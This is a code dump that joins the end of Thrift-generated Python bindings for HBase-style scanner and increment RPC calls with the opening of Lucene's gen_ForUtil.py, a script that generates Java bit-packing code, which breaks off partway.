if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('increment_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.increment is not None:
oprot.writeFieldBegin('increment', TType.STRUCT, 2)
self.increment.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.increment is None:
raise TProtocol.TProtocolException(message='Required field increment is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class increment_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (TResult, TResult.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = TResult()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('increment_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class openScanner_args:
"""
Attributes:
- table: the table to get the Scanner for
- scan: the scan object to get a Scanner for
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'table', None, None, ), # 1
(2, TType.STRUCT, 'scan', (TScan, TScan.thrift_spec), None, ), # 2
)
def __init__(self, table=None, scan=None,):
self.table = table
self.scan = scan
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.table = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.scan = TScan()
self.scan.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('openScanner_args')
if self.table is not None:
oprot.writeFieldBegin('table', TType.STRING, 1)
oprot.writeString(self.table)
oprot.writeFieldEnd()
if self.scan is not None:
oprot.writeFieldBegin('scan', TType.STRUCT, 2)
self.scan.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.table is None:
raise TProtocol.TProtocolException(message='Required field table is unset!')
if self.scan is None:
raise TProtocol.TProtocolException(message='Required field scan is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class openScanner_result:
"""
Attributes:
- success
- io
"""
thrift_spec = (
(0, TType.I32, 'success', None, None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
)
def __init__(self, success=None, io=None,):
self.success = success
self.io = io
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I32:
self.success = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('openScanner_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I32, 0)
oprot.writeI32(self.success)
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getScannerRows_args:
"""
Attributes:
- scannerId: the Id of the Scanner to return rows from. This is an Id returned from the openScanner function.
- numRows: number of rows to return
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'scannerId', None, None, ), # 1
(2, TType.I32, 'numRows', None, 1, ), # 2
)
def __init__(self, scannerId=None, numRows=thrift_spec[2][4],):
self.scannerId = scannerId
self.numRows = numRows
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.scannerId = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.numRows = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getScannerRows_args')
if self.scannerId is not None:
oprot.writeFieldBegin('scannerId', TType.I32, 1)
oprot.writeI32(self.scannerId)
oprot.writeFieldEnd()
if self.numRows is not None:
oprot.writeFieldBegin('numRows', TType.I32, 2)
oprot.writeI32(self.numRows)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.scannerId is None:
raise TProtocol.TProtocolException(message='Required field scannerId is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getScannerRows_result:
"""
Attributes:
- success
- io
- ia: if the scannerId is invalid
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(TResult, TResult.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'ia', (TIllegalArgument, TIllegalArgument.thrift_spec), None, ), # 2
)
def __init__(self, success=None, io=None, ia=None,):
self.success = success
self.io = io
self.ia = ia
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype80, _size77) = iprot.readListBegin()
for _i81 in xrange(_size77):
_elem82 = TResult()
_elem82.read(iprot)
self.success.append(_elem82)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.ia = TIllegalArgument()
self.ia.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getScannerRows_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter83 in self.success:
iter83.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
if self.ia is not None:
oprot.writeFieldBegin('ia', TType.STRUCT, 2)
self.ia.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class closeScanner_args:
"""
Attributes:
- scannerId: the Id of the Scanner to close *
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'scannerId', None, None, ), # 1
)
def __init__(self, scannerId=None,):
self.scannerId = scannerId
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.scannerId = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('closeScanner_args')
if self.scannerId is not None:
oprot.writeFieldBegin('scannerId', TType.I32, 1)
oprot.writeI32(self.scannerId)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.scannerId is None:
raise TProtocol.TProtocolException(message='Required field scannerId is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class closeScanner_result:
"""
Attributes:
- io
- ia: if the scannerId is invalid
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'ia', (TIllegalArgument, TIllegalArgument.thrift_spec), None, ), # 2
)
def __init__(self, io=None, ia=None,):
self.io = io
self.ia = ia
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.io = TIOError()
self.io.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.ia = TIllegalArgument()
self.ia.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('closeScanner_result')
if self.io is not None:
oprot.writeFieldBegin('io', TType.STRUCT, 1)
self.io.write(oprot)
oprot.writeFieldEnd()
if self.ia is not None:
oprot.writeFieldBegin('ia', TType.STRUCT, 2)
self.ia.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
|
lucene/backward-codecs/src/java/org/apache/lucene/backward_codecs/lucene84/gen_ForUtil.py | dameikle/lucene | 903 | 12748420 | #! /usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from fractions import gcd
"""Code generation for ForUtil.java"""
MAX_SPECIALIZED_BITS_PER_VALUE = 24
OUTPUT_FILE = "ForUtil.java"
PRIMITIVE_SIZE = [8, 16, 32]
HEADER = """// This file has been automatically generated, DO NOT EDIT
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.lucene.backward_codecs.lucene84;
import java.io.IOException;
import org.apache.lucene.store.DataInput;
import org.apache.lucene.store.DataOutput;
// Inspired from https://fulmicoton.com/posts/bitpacking/
// Encodes multiple integers in a long to get SIMD-like speedups.
// If bitsPerValue <= 8 then we pack 8 ints per long
// else if bitsPerValue <= 16 we pack 4 ints per long
// else we pack 2 ints per long
final class ForUtil {
static final int BLOCK_SIZE = 128;
private static final int BLOCK_SIZE_LOG2 = 7;
private static long expandMask32(long mask32) {
return mask32 | (mask32 << 32);
}
private static long expandMask16(long mask16) {
return expandMask32(mask16 | (mask16 << 16));
}
private static long expandMask8(long mask8) {
return expandMask16(mask8 | (mask8 << 8));
}
private static long mask32(int bitsPerValue) {
return expandMask32((1L << bitsPerValue) - 1);
}
private static long mask16(int bitsPerValue) {
return expandMask16((1L << bitsPerValue) - 1);
}
private static long mask8(int bitsPerValue) {
return expandMask8((1L << bitsPerValue) - 1);
}
private static void expand8(long[] arr) {
for (int i = 0; i < 16; ++i) {
long l = arr[i];
arr[i] = (l >>> 56) & 0xFFL;
arr[16 + i] = (l >>> 48) & 0xFFL;
arr[32 + i] = (l >>> 40) & 0xFFL;
arr[48 + i] = (l >>> 32) & 0xFFL;
arr[64 + i] = (l >>> 24) & 0xFFL;
arr[80 + i] = (l >>> 16) & 0xFFL;
arr[96 + i] = (l >>> 8) & 0xFFL;
arr[112 + i] = l & 0xFFL;
}
}
private static void expand8To32(long[] arr) {
for (int i = 0; i < 16; ++i) {
long l = arr[i];
arr[i] = (l >>> 24) & 0x000000FF000000FFL;
arr[16 + i] = (l >>> 16) & 0x000000FF000000FFL;
arr[32 + i] = (l >>> 8) & 0x000000FF000000FFL;
arr[48 + i] = l & 0x000000FF000000FFL;
}
}
private static void collapse8(long[] arr) {
for (int i = 0; i < 16; ++i) {
arr[i] =
(arr[i] << 56)
| (arr[16 + i] << 48)
| (arr[32 + i] << 40)
| (arr[48 + i] << 32)
| (arr[64 + i] << 24)
| (arr[80 + i] << 16)
| (arr[96 + i] << 8)
| arr[112 + i];
}
}
private static void expand16(long[] arr) {
for (int i = 0; i < 32; ++i) {
long l = arr[i];
arr[i] = (l >>> 48) & 0xFFFFL;
arr[32 + i] = (l >>> 32) & 0xFFFFL;
arr[64 + i] = (l >>> 16) & 0xFFFFL;
arr[96 + i] = l & 0xFFFFL;
}
}
private static void expand16To32(long[] arr) {
for (int i = 0; i < 32; ++i) {
long l = arr[i];
arr[i] = (l >>> 16) & 0x0000FFFF0000FFFFL;
arr[32 + i] = l & 0x0000FFFF0000FFFFL;
}
}
private static void collapse16(long[] arr) {
for (int i = 0; i < 32; ++i) {
arr[i] = (arr[i] << 48) | (arr[32 + i] << 32) | (arr[64 + i] << 16) | arr[96 + i];
}
}
private static void expand32(long[] arr) {
for (int i = 0; i < 64; ++i) {
long l = arr[i];
arr[i] = l >>> 32;
arr[64 + i] = l & 0xFFFFFFFFL;
}
}
private static void collapse32(long[] arr) {
for (int i = 0; i < 64; ++i) {
arr[i] = (arr[i] << 32) | arr[64 + i];
}
}
private static void prefixSum8(long[] arr, long base) {
expand8To32(arr);
prefixSum32(arr, base);
}
private static void prefixSum16(long[] arr, long base) {
// We need to move to the next primitive size to avoid overflows
expand16To32(arr);
prefixSum32(arr, base);
}
private static void prefixSum32(long[] arr, long base) {
arr[0] += base << 32;
innerPrefixSum32(arr);
expand32(arr);
final long l = arr[BLOCK_SIZE / 2 - 1];
for (int i = BLOCK_SIZE / 2; i < BLOCK_SIZE; ++i) {
arr[i] += l;
}
}
// For some reason unrolling seems to help
private static void innerPrefixSum32(long[] arr) {
arr[1] += arr[0];
arr[2] += arr[1];
arr[3] += arr[2];
arr[4] += arr[3];
arr[5] += arr[4];
arr[6] += arr[5];
arr[7] += arr[6];
arr[8] += arr[7];
arr[9] += arr[8];
arr[10] += arr[9];
arr[11] += arr[10];
arr[12] += arr[11];
arr[13] += arr[12];
arr[14] += arr[13];
arr[15] += arr[14];
arr[16] += arr[15];
arr[17] += arr[16];
arr[18] += arr[17];
arr[19] += arr[18];
arr[20] += arr[19];
arr[21] += arr[20];
arr[22] += arr[21];
arr[23] += arr[22];
arr[24] += arr[23];
arr[25] += arr[24];
arr[26] += arr[25];
arr[27] += arr[26];
arr[28] += arr[27];
arr[29] += arr[28];
arr[30] += arr[29];
arr[31] += arr[30];
arr[32] += arr[31];
arr[33] += arr[32];
arr[34] += arr[33];
arr[35] += arr[34];
arr[36] += arr[35];
arr[37] += arr[36];
arr[38] += arr[37];
arr[39] += arr[38];
arr[40] += arr[39];
arr[41] += arr[40];
arr[42] += arr[41];
arr[43] += arr[42];
arr[44] += arr[43];
arr[45] += arr[44];
arr[46] += arr[45];
arr[47] += arr[46];
arr[48] += arr[47];
arr[49] += arr[48];
arr[50] += arr[49];
arr[51] += arr[50];
arr[52] += arr[51];
arr[53] += arr[52];
arr[54] += arr[53];
arr[55] += arr[54];
arr[56] += arr[55];
arr[57] += arr[56];
arr[58] += arr[57];
arr[59] += arr[58];
arr[60] += arr[59];
arr[61] += arr[60];
arr[62] += arr[61];
arr[63] += arr[62];
}
private static void readLELongs(DataInput in, long[] dst, int offset, int length)
throws IOException {
in.readLongs(dst, offset, length);
for (int i = 0; i < length; ++i) {
dst[offset + i] = Long.reverseBytes(dst[offset + i]);
}
}
private final long[] tmp = new long[BLOCK_SIZE / 2];
/** Encode 128 integers from {@code longs} into {@code out}. */
void encode(long[] longs, int bitsPerValue, DataOutput out) throws IOException {
final int nextPrimitive;
final int numLongs;
if (bitsPerValue <= 8) {
nextPrimitive = 8;
numLongs = BLOCK_SIZE / 8;
collapse8(longs);
} else if (bitsPerValue <= 16) {
nextPrimitive = 16;
numLongs = BLOCK_SIZE / 4;
collapse16(longs);
} else {
nextPrimitive = 32;
numLongs = BLOCK_SIZE / 2;
collapse32(longs);
}
final int numLongsPerShift = bitsPerValue * 2;
int idx = 0;
int shift = nextPrimitive - bitsPerValue;
for (int i = 0; i < numLongsPerShift; ++i) {
tmp[i] = longs[idx++] << shift;
}
for (shift = shift - bitsPerValue; shift >= 0; shift -= bitsPerValue) {
for (int i = 0; i < numLongsPerShift; ++i) {
tmp[i] |= longs[idx++] << shift;
}
}
final int remainingBitsPerLong = shift + bitsPerValue;
final long maskRemainingBitsPerLong;
if (nextPrimitive == 8) {
maskRemainingBitsPerLong = MASKS8[remainingBitsPerLong];
} else if (nextPrimitive == 16) {
maskRemainingBitsPerLong = MASKS16[remainingBitsPerLong];
} else {
maskRemainingBitsPerLong = MASKS32[remainingBitsPerLong];
}
int tmpIdx = 0;
int remainingBitsPerValue = bitsPerValue;
while (idx < numLongs) {
if (remainingBitsPerValue >= remainingBitsPerLong) {
remainingBitsPerValue -= remainingBitsPerLong;
tmp[tmpIdx++] |= (longs[idx] >>> remainingBitsPerValue) & maskRemainingBitsPerLong;
if (remainingBitsPerValue == 0) {
idx++;
remainingBitsPerValue = bitsPerValue;
}
} else {
final long mask1, mask2;
if (nextPrimitive == 8) {
mask1 = MASKS8[remainingBitsPerValue];
mask2 = MASKS8[remainingBitsPerLong - remainingBitsPerValue];
} else if (nextPrimitive == 16) {
mask1 = MASKS16[remainingBitsPerValue];
mask2 = MASKS16[remainingBitsPerLong - remainingBitsPerValue];
} else {
mask1 = MASKS32[remainingBitsPerValue];
mask2 = MASKS32[remainingBitsPerLong - remainingBitsPerValue];
}
tmp[tmpIdx] |= (longs[idx++] & mask1) << (remainingBitsPerLong - remainingBitsPerValue);
remainingBitsPerValue = bitsPerValue - remainingBitsPerLong + remainingBitsPerValue;
tmp[tmpIdx++] |= (longs[idx] >>> remainingBitsPerValue) & mask2;
}
}
for (int i = 0; i < numLongsPerShift; ++i) {
// Java longs are big endian and we want to read little endian longs, so we need to reverse
// bytes
long l = Long.reverseBytes(tmp[i]);
out.writeLong(l);
}
}
/** Number of bytes required to encode 128 integers of {@code bitsPerValue} bits per value. */
int numBytes(int bitsPerValue) throws IOException {
return bitsPerValue << (BLOCK_SIZE_LOG2 - 3);
}
private static void decodeSlow(int bitsPerValue, DataInput in, long[] tmp, long[] longs)
throws IOException {
final int numLongs = bitsPerValue << 1;
readLELongs(in, tmp, 0, numLongs);
final long mask = MASKS32[bitsPerValue];
int longsIdx = 0;
int shift = 32 - bitsPerValue;
for (; shift >= 0; shift -= bitsPerValue) {
shiftLongs(tmp, numLongs, longs, longsIdx, shift, mask);
longsIdx += numLongs;
}
final int remainingBitsPerLong = shift + bitsPerValue;
final long mask32RemainingBitsPerLong = MASKS32[remainingBitsPerLong];
int tmpIdx = 0;
int remainingBits = remainingBitsPerLong;
for (; longsIdx < BLOCK_SIZE / 2; ++longsIdx) {
int b = bitsPerValue - remainingBits;
long l = (tmp[tmpIdx++] & MASKS32[remainingBits]) << b;
while (b >= remainingBitsPerLong) {
b -= remainingBitsPerLong;
l |= (tmp[tmpIdx++] & mask32RemainingBitsPerLong) << b;
}
if (b > 0) {
l |= (tmp[tmpIdx] >>> (remainingBitsPerLong - b)) & MASKS32[b];
remainingBits = remainingBitsPerLong - b;
} else {
remainingBits = remainingBitsPerLong;
}
longs[longsIdx] = l;
}
}
/**
* The pattern that this shiftLongs method applies is recognized by the C2 compiler, which
* generates SIMD instructions for it in order to shift multiple longs at once.
*/
private static void shiftLongs(long[] a, int count, long[] b, int bi, int shift, long mask) {
for (int i = 0; i < count; ++i) {
b[bi + i] = (a[i] >>> shift) & mask;
}
}
"""
def writeRemainderWithSIMDOptimize(bpv, next_primitive, remaining_bits_per_long, o, num_values, f):
iteration = 1
num_longs = bpv * num_values / remaining_bits_per_long
while num_longs % 2 == 0 and num_values % 2 == 0:
num_longs /= 2
num_values /= 2
iteration *= 2
f.write(' shiftLongs(tmp, %d, tmp, 0, 0, MASK%d_%d);\n' % (iteration * num_longs, next_primitive, remaining_bits_per_long))
f.write(' for (int iter = 0, tmpIdx = 0, longsIdx = %d; iter < %d; ++iter, tmpIdx += %d, longsIdx += %d) {\n' %(o, iteration, num_longs, num_values))
tmp_idx = 0
b = bpv
b -= remaining_bits_per_long
f.write(' long l0 = tmp[tmpIdx + %d] << %d;\n' %(tmp_idx, b))
tmp_idx += 1
while b >= remaining_bits_per_long:
b -= remaining_bits_per_long
f.write(' l0 |= tmp[tmpIdx + %d] << %d;\n' %(tmp_idx, b))
tmp_idx += 1
f.write(' longs[longsIdx + 0] = l0;\n')
f.write(' }\n')
def writeRemainder(bpv, next_primitive, remaining_bits_per_long, o, num_values, f):
iteration = 1
num_longs = bpv * num_values / remaining_bits_per_long
while num_longs % 2 == 0 and num_values % 2 == 0:
num_longs /= 2
num_values /= 2
iteration *= 2
f.write(' for (int iter = 0, tmpIdx = 0, longsIdx = %d; iter < %d; ++iter, tmpIdx += %d, longsIdx += %d) {\n' %(o, iteration, num_longs, num_values))
i = 0
remaining_bits = 0
tmp_idx = 0
for i in range(num_values):
b = bpv
if remaining_bits == 0:
b -= remaining_bits_per_long
f.write(' long l%d = (tmp[tmpIdx + %d] & MASK%d_%d) << %d;\n' %(i, tmp_idx, next_primitive, remaining_bits_per_long, b))
else:
b -= remaining_bits
f.write(' long l%d = (tmp[tmpIdx + %d] & MASK%d_%d) << %d;\n' %(i, tmp_idx, next_primitive, remaining_bits, b))
tmp_idx += 1
while b >= remaining_bits_per_long:
b -= remaining_bits_per_long
f.write(' l%d |= (tmp[tmpIdx + %d] & MASK%d_%d) << %d;\n' %(i, tmp_idx, next_primitive, remaining_bits_per_long, b))
tmp_idx += 1
if b > 0:
f.write(' l%d |= (tmp[tmpIdx + %d] >>> %d) & MASK%d_%d;\n' %(i, tmp_idx, remaining_bits_per_long-b, next_primitive, b))
remaining_bits = remaining_bits_per_long-b
f.write(' longs[longsIdx + %d] = l%d;\n' %(i, i))
f.write(' }\n')
def writeDecode(bpv, f):
next_primitive = 32
if bpv <= 8:
next_primitive = 8
elif bpv <= 16:
next_primitive = 16
f.write(' private static void decode%d(DataInput in, long[] tmp, long[] longs) throws IOException {\n' %bpv)
num_values_per_long = 64 / next_primitive
if bpv == next_primitive:
f.write(' readLELongs(in, longs, 0, %d);\n' %(bpv*2))
else:
f.write(' readLELongs(in, tmp, 0, %d);\n' %(bpv*2))
shift = next_primitive - bpv
o = 0
while shift >= 0:
f.write(' shiftLongs(tmp, %d, longs, %d, %d, MASK%d_%d);\n' %(bpv*2, o, shift, next_primitive, bpv))
o += bpv*2
shift -= bpv
if shift + bpv > 0:
if bpv % (next_primitive % bpv) == 0:
writeRemainderWithSIMDOptimize(bpv, next_primitive, shift + bpv, o, 128/num_values_per_long - o, f)
else:
writeRemainder(bpv, next_primitive, shift + bpv, o, 128/num_values_per_long - o, f)
f.write(' }\n')
f.write('\n')
if __name__ == '__main__':
f = open(OUTPUT_FILE, 'w')
f.write(HEADER)
for primitive_size in PRIMITIVE_SIZE:
f.write(' private static final long[] MASKS%d = new long[%d];\n' %(primitive_size, primitive_size))
f.write('\n')
f.write(' static {\n')
for primitive_size in PRIMITIVE_SIZE:
f.write(' for (int i = 0; i < %d; ++i) {\n' %primitive_size)
f.write(' MASKS%d[i] = mask%d(i);\n' %(primitive_size, primitive_size))
f.write(' }\n')
f.write(' }\n')
f.write(' // mark values in array as final longs to avoid the cost of reading array, arrays should only be\n')
f.write(' // used when the idx is a variable\n')
for primitive_size in PRIMITIVE_SIZE:
for bpv in range(1, min(MAX_SPECIALIZED_BITS_PER_VALUE + 1, primitive_size)):
if bpv * 2 != primitive_size or primitive_size == 8:
f.write(' private static final long MASK%d_%d = MASKS%d[%d];\n' %(primitive_size, bpv, primitive_size, bpv))
f.write("""
/** Decode 128 integers into {@code longs}. */
